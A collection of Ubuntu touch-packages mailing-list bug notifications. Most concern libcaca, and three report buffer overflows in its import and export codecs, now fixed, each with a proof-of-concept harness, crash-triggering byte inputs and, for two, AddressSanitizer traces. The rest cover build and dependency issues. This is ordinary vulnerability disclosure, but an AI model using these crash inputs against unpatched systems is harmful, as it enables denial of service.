[Touch-packages] [Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin
was solved in 0.99.beta20-1
** Changed in: libcaca (Ubuntu)
Status: Triaged => Fix Released
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1925468
Title:
stack-buffer-overflow of import.c in function _import_bin
Status in libcaca:
Fix Released
Status in libcaca package in Ubuntu:
Fix Released
Bug description:
Hello ubuntu security team
issues:https://github.com/cacalabs/libcaca/issues/56
System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1
libcaca version e4968ba
Verification steps:
1.Get the source code of libcaca
2.Compile the libcaca.so library
$ cd libcaca
$ ./bootstrap
$ ./configure
$ make
or
$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-frame-pointer -g
-fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link
-fsanitize-coverage=bb"
$ make
3.Create the poc_bin.cc && build
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include
#include
#include
#include
#include
#include
using namespace std;
void crash(const uint8_t *Data, size_t Size) {
if(Size<8) return ;
size_t len=0;
caca_canvas_t *cv;
cv = caca_create_canvas(0,0);
caca_create_frame(cv,0);
caca_set_frame(cv,0);
caca_import_canvas_from_memory(cv,Data,Size,"bin");
caca_free_canvas(cv);
cv=NULL;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] =
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
len = sizeof(buffer)/sizeof(unsigned char);
printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
crash((const uint8_t*)buffer,len);
return 0;
}
4.compile poc_bin.cc
clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin
5.Run poc_bin
asan info:
=
==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
READ of size 1 at 0x7ffe7cd3774d thread T0
#0 0x7f8c6314acfc in _import_bin
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
#1 0x4c6c72 in crash(unsigned char const*, unsigned long)
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
#2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
#3 0x7f8c62ba00b2 in __libc_start_main
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
#0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
This frame has 1 object(s):
[32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this
variable
HINT: this may be a false positive if your program uses some custom stack
unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
Shadow bytes around the buggy address:
0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user:f7
Container overflow: fc
Array cookie:ac
Intra object redzone:bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone:cb
Shadow gap: cc
==3817476==ABORTING
Thanks
To manage notifications about this bug go to:
[Touch-packages] [Bug 1925467] Re: stack-buffer-overflow of text.c in function _import_ansi
was solved in 0.99.beta20-1
** Changed in: libcaca (Ubuntu)
Status: Triaged => Fix Released
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1925467
Title:
stack-buffer-overflow of text.c in function _import_ansi
Status in libcaca:
Fix Released
Status in libcaca package in Ubuntu:
Fix Released
Bug description:
Hello ubuntu security team
issues: https://github.com/cacalabs/libcaca/issues/55
System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1
libcaca version e4968ba
Verification steps:
1.Get the source code of libcaca
2.Compile the libcaca.so library
$ cd libcaca
$ ./bootstrap
$ ./configure
$ make
or
$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-frame-pointer -g
-fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link
-fsanitize-coverage=bb"
$ make
3.Create the poc_ansi.cc && build
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include
#include
#include
#include
#include
#include
using namespace std;
void crash(const uint8_t *Data, size_t Size) {
if(Size<8) return ;
size_t len=0;
caca_canvas_t *cv;
cv = caca_create_canvas(0,0);
caca_create_frame(cv,0);
caca_set_frame(cv,0);
caca_import_canvas_from_memory(cv,Data,Size,"ansi");
caca_free_canvas(cv);
cv=NULL;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] =
{0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc};
len = sizeof(buffer)/sizeof(unsigned char);
printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
crash((const uint8_t*)buffer,len);
return 0;
}
4.compile poc_ansi.cc
clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_ansi
5.Run poc_ansi
asan info:
=
==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8
READ of size 1 at 0x7ffda0164bea thread T0
#0 0x7f098d82c30f in _import_ansi
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38
#1 0x4c6c72 in crash(unsigned char const*, unsigned long)
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
#2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
#3 0x7f098d2780b2 in __libc_start_main
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d)
Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame
#0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
This frame has 1 object(s):
[32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this
variable
HINT: this may be a false positive if your program uses some custom stack
unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi
Shadow bytes around the buggy address:
0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2
0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00
0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100034024970: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00[02]f3 f3
0x100034024980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100034024990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000340249a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000340249b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000340249c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user:f7
Container overflow: fc
Array cookie:ac
Intra object redzone:bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone:cb
Shadow gap: cc
==3763372==ABORTING
Thanks
To manage notifications about this bug go to:
[Touch-packages] [Bug 1229282] Re: libcaca ftbfs in saucy (pdftex errors)
** Changed in: libcaca (Ubuntu)
Status: Confirmed => Fix Released
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1229282
Title:
libcaca ftbfs in saucy (pdftex errors)
Status in libcaca package in Ubuntu:
Fix Released
Status in libcaca package in Debian:
Fix Released
Bug description:
! Missing number, treated as zero.
\relax
l.9 \-
\_\-\-\_\-extern char const $\ast$const $\ast$
\hyperlink{group__caca_...
A number should have been here; I inserted `0'.
(If you can't figure out why I needed to see a number,
look up `weird error' in the index to The TeXbook.)
! Illegal unit of measure (pt inserted).
\relax
l.9 \-
\_\-\-\_\-extern char const $\ast$const $\astmake[3]: *** [stamp-latex]
Er
ror 1
make[3]: Leaving directory `/build/buildd/libcaca-0.99.beta18/doc'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/build/buildd/libcaca-0.99.beta18'
make[1]: *** [all] Error 2
make[1]: Leaving directory `/build/buildd/libcaca-0.99.beta18'
make: *** [build-arch-stamp] Error 2
dpkg-buildpackage: error: debian/rules build gave error exit status 2
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1229282/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
** Changed in: libcaca (Ubuntu)
Status: Confirmed => Fix Released
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1923273
Title:
buffer-overflow on libcaca-0.99.beta20/export.c export_tga,
export_troff
Status in libcaca package in Ubuntu:
Fix Released
Bug description:
Hello Ubuntu Security Team
I use libfuzzer to test libcaca api .I found two crash
- https://github.com/cacalabs/libcaca/issues/53
- https://github.com/cacalabs/libcaca/issues/54
## Vendor of Product
https://github.com/cacalabs/libcaca
## Affected Product Code Base
libcaca e4968ba
## Affected Component
affected component:libcaca.so
## Affected source code file
affected source code file(As call stack):
->caca_export_canvas_to_memory() in
libcaca/caca/codec/export.c
->caca_export_memory()in
libcaca/caca/codec/export.c
-> export_tga()in
libcaca/caca/codec/export.c
-> export_troff() in
libcaca/caca/codec/export.c
## Attack Type
Context-dependent
## Impact Denial of Service
true
## Reference
https://github.com/cacalabs/libcaca
## Discoverer
fdgnneig
## Verification process and POC
### Verification steps:
1.Get the source code of libcaca:
2.Compile the libcaca.so library:
```shell
$ cd libcaca
$ apt-get install automake libtool pkg-config -y
$ ./bootstrap
$ ./configure
$ make
3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc
4.Run POC
POC.sh
```
cat << EOF > poc_troff.cc
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include
#include
#include
#include
#include
#include
using namespace std;
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
Size) {
if(Size<8) return 0;
size_t len=0;
char* buffer = (char*)malloc(Size+1);
memset(buffer,0,Size);
memcpy(buffer,Data,Size);
buffer[Size]='\0';
caca_canvas_t *cv;
cv = caca_create_canvas(0,0);
for(int i=0;i<4;i++)
caca_create_frame(cv,0);
for(int i=0;i<4;i++){
caca_set_frame(cv,i);
caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
}
void* reData = caca_export_canvas_to_memory(cv,"troff",);
if(reData!=NULL) free(reData);
caca_free_canvas(cv);
cv=NULL;
free(buffer);
buffer=NULL;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] =
{0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11};
len = sizeof(buffer)/sizeof(unsigned char);
LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
return 0;
}
EOF
clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o
poc_troff
cat << EOF > poc_tga.cc
#include "config.h"
#include "caca.h"
#include
#include
#include
#include
#include
#include
using namespace std;
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
Size) {
if(Size<8) return 0;
size_t len=0;
char* buffer = (char*)malloc(Size+1);
memset(buffer,0,Size);
memcpy(buffer,Data,Size);
buffer[Size]='\0';
caca_canvas_t *cv;
cv = caca_create_canvas(0,0);
for(int i=0;i<4;i++)
caca_create_frame(cv,0);
for(int i=0;i<4;i++){
caca_set_frame(cv,i);
caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
}
void* reData = caca_export_canvas_to_memory(cv,"tga",);
if(reData!=NULL) free(reData);
caca_free_canvas(cv);
cv=NULL;
free(buffer);
buffer=NULL;
return 0;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] =
{0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11};
len = sizeof(buffer)/sizeof(unsigned char);
LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
return 0;
}
EOF
[Touch-packages] [Bug 1789022] Re: libcaca0 still depends on old libncursesw5 and libtinfo5
** Changed in: libcaca (Ubuntu) Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1789022 Title: libcaca0 still depends on old libncursesw5 and libtinfo5 Status in libcaca package in Ubuntu: Fix Released Bug description: Ubuntu Cosmic switched some time ago from ncurses5 to ncurses6. However, the package libcaca0 still depends on old libncursesw5 and libtinfo5 instead of libncursesw6 and libtinfo6. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1789022/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1910391] [NEW] Lightdm is not working on minimal DE install without recommends
Public bug reported: I tried to install Focal with minimal DE without install recommends and installing lightdm. On debian works "out of the box" on ubuntu not, lightdm fails to start. I saw that issue is because missing a greeter, on debian is correctly as dependencies, on ubuntu packages is instead as recommends, moving from recommends to dependens will solve this. ** Affects: lightdm (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lightdm in Ubuntu. https://bugs.launchpad.net/bugs/1910391 Title: Lightdm is not working on minimal DE install without recommends Status in lightdm package in Ubuntu: New Bug description: I tried to install Focal with minimal DE without install recommends and installing lightdm. On debian works "out of the box" on ubuntu not, lightdm fails to start. I saw that issue is because missing a greeter, on debian is correctly as dependencies, on ubuntu packages is instead as recommends, moving from recommends to dependens will solve this. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1910391/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1320422] Re: Please merge dbus 1.8.2-1 (main) from Debian testing (main)
Update dbus should solves also latest cjs fail to build. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to dbus in Ubuntu. https://bugs.launchpad.net/bugs/1320422 Title: Please merge dbus 1.8.2-1 (main) from Debian testing (main) Status in “dbus” package in Ubuntu: In Progress Bug description: I'm working on a debdiff to resync our dbus package with the current version in Debian testing. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1320422/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
